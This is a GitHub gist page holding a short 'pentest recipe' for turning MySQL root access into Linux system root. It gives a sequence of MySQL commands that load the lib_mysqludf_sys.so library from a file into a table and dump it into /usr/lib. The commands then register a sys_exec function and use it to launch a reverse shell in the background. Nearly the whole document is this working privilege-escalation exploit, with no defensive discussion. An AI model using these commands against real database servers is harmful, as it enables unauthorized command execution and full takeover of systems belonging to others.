Skip to content

Instantly share code, notes, and snippets.

@p0c

p0c/mysql_root_to_system_root

Last active August 14, 2021 23:58
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save p0c/8587757 to your computer and use it in GitHub Desktop.
Save p0c/8587757 to your computer and use it in GitHub Desktop.
Download ZIP
#pentest #recipe: mysql root -> system root (linux)
Raw
mysql_root_to_system_root
# download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql
# (currently not present in kali's sqlmap, only the windows one, the same for metasploit...)
mysql> use mysql;
mysql> create table test(line blob);
mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so'));
mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so';
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
mysql> select sys_exec('./reverse_shell &');
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment